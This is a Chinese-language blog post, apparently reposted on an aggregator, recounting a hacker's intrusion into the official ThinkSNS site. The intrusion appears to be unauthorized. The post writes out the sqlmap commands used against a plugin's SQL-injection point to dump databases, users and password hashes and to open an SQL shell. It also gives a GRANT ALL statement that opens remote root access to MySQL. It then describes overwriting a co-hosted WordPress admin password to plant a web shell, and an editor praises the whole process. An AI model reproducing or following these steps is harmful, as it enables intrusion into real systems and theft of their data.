（本文涉及的所有漏洞已經被修復！）

（由于文章是后來補寫的，有些圖可能無法抓到。sorry）

ThinkSNS(簡稱TS)，開源微博引擎。

一直都在看thinksns的代碼，但是由于很彩筆，一直沒找到什么實質的漏洞，

某天在90sec上，看到某黑闊發的thinksns注入0day，看了下，是一個插件的注入，注入點:index.php?app=blog& mod=Index&act=show&id=2211，慚愧啊，差距啊，羞憤難平的我心中冒出了邪惡的想法。。。。。

——————–分割線————————

0x01 Nmap照亮前方的路

nmap -sS -sU -T4 -A -v thinksns.com

我最喜歡的一個配置，速度也不錯，

linux服務器，apache

哈哈，lamp配置

果斷看到一個3306

嘎嘎，本地的mysql

然后，就沒收集到什么了。。。。。

0x02 Sqlmap凸顯神威

http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211

拿到注入點，為了抓緊時間，和管理員賽跑，直接上sqlmap！

# sqlmap.py -u http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211

回顯了數據庫版本，5.x的

很好，可以注入！

# sqlmap.py -u http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211 –dbs

列出了所有庫

oh，great！

一個t_thinksns

一個thinksns

一個wp的blog的庫

還有幾個小庫

于是想直接注入t_thinksns這個庫

# sqlmap.py -u http://t.thinksns.com/index.php? app=blog&mod=Index&act=show&id=2211 –tables -D t_thinksns

然后一步步爆密碼

其實我個人感覺如果只是注入的話，union select肯定更快，但是我電腦裝的ubuntu，是沒有小葵那個轉碼工具的，雖然可以用burp suite的 編碼轉換，但是，不喜歡用

搞到密碼。開始跑。。。。。

忽然發現哥又二逼了，這種站，找不到后臺的吧。。。

翻了好多頁都沒看到后臺

這里在啰嗦下，其實也可以用so.360.cn 這個二貨引擎抓取了好多大站后臺，無視robots

然后

sqlmap.py -u http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211 –users

注入mysql的用戶試試

我其實比較性急，所以直接注入，看能不能得到，我一般都不看注入權的

激動了，竟然得到了幾個用戶 root t_thinsns(應該就是這個注入的用戶)還有幾個不記得了

sqlmap.py -u http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211 –passwords

果斷得到root的密文！權限真大啊

于是想直接去寫shell

哪知道完全爆不到路徑

googlehack也沒報到，fuck。。。

于是去破解root的密文

放到md5破解 成功了- –

運氣真好！

密文ts**00

然后果斷

sqlmap.py -u http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211 –sql-shell

得到了一個交互的shell

system vi /etctpd/conftpd.conf;

我表示還是想找下路徑，寫shell有安全感。。。。

目測交互性很差，什么回顯都沒- -，于是執行了

GRANT ALL PRIVILEGES ON . TO ‘root’@’%’ IDENTIFIED BY ‘ts**00’ WITH GRANT OPTION;

開啟外連

也不知道成功了沒- –

期間我還用metaspolit執行過，不知道是哪個起的作用

到這里 Sqlmap貌似就失去了他的魅力- –

0x03 Windows下的延續

有了root ，我馬上換了windows

畢竟這個更熟悉

首先我試了試Navicat

成功連接，看來開啟外聯成功了

然后，，，再vi。。。

執行成功，又沒回顯

根據經驗，應該是交互性差了的原因

果斷換mysql

讀出來了

這一段是在戰虎基友幫助下完成的，我的mysql似乎sb了

飛 15:42:29

你試試system函數

’ 戰虎 15:42:28

你換個環境試試。

’ 戰虎 15:42:40

你自己 裝的那個mysql 有問題。

飛 15:42:43

– –

飛 15:42:47

appserv

飛 15:42:50

繼承

’ 戰虎 15:42:52

…

’ 戰虎 15:42:57

我的也是

可是，還是完全沒權限寫到web目錄，權重做得真好啊！！

0x04 另辟蹊徑 山回路轉

一下子頓時sb了。。。

怎么辦，怎么辦

忽然想到旁注上面還有好多站，有個blog，一下子又激動了！！

*其實爆路徑

更ＮＢ的是用谷歌瀏覽器　 直接訪問加入個linux.php 爆路徑（戰虎提供的思路）

然后，navicat直接找到那個blog的數據庫，

發現密碼很黑闊，

不過我們不怕，既然解密不出管理的密碼，我們本地搭建wp-blog

然后生成一個密碼，覆蓋之，

以后再還原！！！

wp的后臺一般都比較弱智，后臺拿shell更無聊，果斷跳過！

最后成功拿到shell！！！

可以跨目錄！

哦也成功！！

至于提權，那是exp的事情了，菜B提不下來

這里，十分感謝戰虎，他的經驗和他的真誠真的讓我很感動，有你相伴，滲透之路更加金彩！

——————-分割線——————-

寫了一個多小時 寫個文章不容易 不喜歡也不要踩啊噴啊。

編輯點評：整個滲透過程很詳細，測試的過程很少是一帆風順的，遇到困難的時候需要的就是耐心和細心了！

喜歡本文的朋友，還可以參考《滲透菲律賓星報官網》

總結

以上是生活随笔為你收集整理的渗透thinksns官网的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。